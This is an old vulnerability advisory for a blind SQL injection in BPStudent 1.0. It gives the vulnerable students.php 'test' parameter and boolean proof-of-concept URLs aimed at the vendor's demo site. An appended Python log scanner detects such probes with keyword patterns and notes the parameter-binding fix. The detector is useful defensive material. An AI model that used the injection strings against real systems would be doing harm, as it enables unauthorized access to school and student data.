BPStudent 1.0 blind SQL Injection by h3m4n


BPStudent 1.0 blind SQL Injection

[x]=======================================================================================================================================[x]
 |                                                          AntiSecurity[dot]org                                                           |
[x]=======================================================================================================================================[x]


[x]=======================================================================================================================================[x]
 | Title                : BPStudent 1.0 blind SQL Vulnerabilities                                                                           |
 | Software             : BPStudent                                                                                                         |
 | Vendor               : http://bpowerhouse.info                                                                                           |
 | Date                 : 22 September 2009 ( Indonesia )                                                                                   |
 | Author               : OoN_Boy                                                                                                           |
 | Contact              : oon.boy9@gmail.com                                                                                                |
 | Web                  : http://oonboy.info                                                                                                |
 | Blog                 : http://oonboy.blogspot.com                                                                                        |
[x]=======================================================================================================================================[x]


[x]=======================================================================================================================================[x]
 | Technology           : PHP5                                                                                                              |
 | Database             : MySQL                                                                                                             |
 | Version              : 1.0                                                                                                               |
 | License              : GNU GPL                                                                                                           |
 | Price                : $27.90                                                                                                            |
 | Description          : This script is an on-site school script, students can register, download study material and take exams; the      |
 |                        system will mark the exams and students can graduate courses; the administrator can create exams, manage students |
 |                        and courses                                                                                                       |
[x]=======================================================================================================================================[x]

OoN Boy                                                                                                             09/22/2009
[x]=======================================================================================================================================[x]
 | Google Dork          : find it yourself :)                                                                                               |
[x]=======================================================================================================================================[x]

[x]=======================================================================================================================================[x]
 | Exploit              : http://localhost/[path]/students.php?page=preview&test=[sql]                                                      |
 | Admin Page           : http://localhost/[path]/admin/index.php                                                                           |
[x]=======================================================================================================================================[x]

[x]=======================================================================================================================================[x]
 | Proof of concept     : http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=5 True  |
 |                        http://bpowerhouse.com/demos/bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=4 False |
 |                      : You must log in to try the exploit :)                                                                             |
[x]=======================================================================================================================================[x]
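The proof-of-concept pair above is a boolean oracle: the preview page renders differently when the injected comparison is true (the first character of @@version is 5) than when it is false, so an attacker can read data one comparison at a time. As an added example that is not part of the advisory, the Python below scans constructed access-log lines (IPs, timestamps and response sizes are made up) and flags requests whose students.php `test` parameter is not a plain numeric id and carries such a comparison; the log format, regexes and function names are this example's own assumptions, not anything from BPStudent.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache access-log sample (not real traffic): the advisory's true/false PoC pair, then a normal id.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Sep/2009:10:01:02 +0700] "GET /bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
10.0.0.5 - - [22/Sep/2009:10:01:03 +0700] "GET /bpstudentsDemo/students.php?page=preview&test=1+and+substring(@@version,1,1)=4 HTTP/1.1" 200 3210
10.0.0.9 - - [22/Sep/2009:10:05:44 +0700] "GET /bpstudentsDemo/students.php?page=preview&test=7 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
# A numeric id followed by a boolean clause that reads server state is the shape of the PoC.
ORACLE_RE = re.compile(r'\b(and|or)\b.*(substring|ascii|mid\(|benchmark|sleep|@@version|information_schema)', re.I)

def parse_line(line):
    # Split one access-log line into its fields, or return None if it does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['size'] = 0 if rec['size'] == '-' else int(rec['size'])
    return rec

def classify_test_param(target):
    """Return (verdict, decoded_test_value) for a students.php?page=preview request."""
    url = urlparse(target)
    if not url.path.endswith('/students.php'):
        return ('not_target', None)
    params = parse_qs(url.query, keep_blank_values=True)   # decodes '+' and %xx escapes
    if params.get('page') != ['preview'] or 'test' not in params:
        return ('other_page', None)
    value = params['test'][0]
    if value.isdigit():
        return ('benign', value)          # legitimate: test is a numeric id in the demo
    if ORACLE_RE.search(value):
        return ('blind_sqli_probe', value)
    return ('suspicious', value)          # non-numeric but no known oracle marker

def scan(log_text):
    """Return (ip, verdict, decoded value, response size) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict, value = classify_test_param(rec['target'])
        if verdict in ('blind_sqli_probe', 'suspicious'):
            hits.append((rec['ip'], verdict, value, rec['size']))
    return hits
```

The differing response sizes of the flagged true/false pair are the oracle channel itself; on the application side the fix is to cast `test` to an integer or bind it as a prepared-statement parameter before it reaches the query.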
[x]=======================================================================================================================================[x]
 | Greetz               : antisecurity.org batamhacker.or.id                                                                                |
 |                        Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                      |
 |                        k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                 |
[x]=======================================================================================================================================[x]

[x]=======================================================================================================================================[x]
 | Note                 : Happy Eid al-Fitr, please forgive me in body and soul; forgive my mistakes all this time, everyone :)            |
 |                        running off.... for a while.... bye bye.....                                                                     |
[x]=======================================================================================================================================[x]
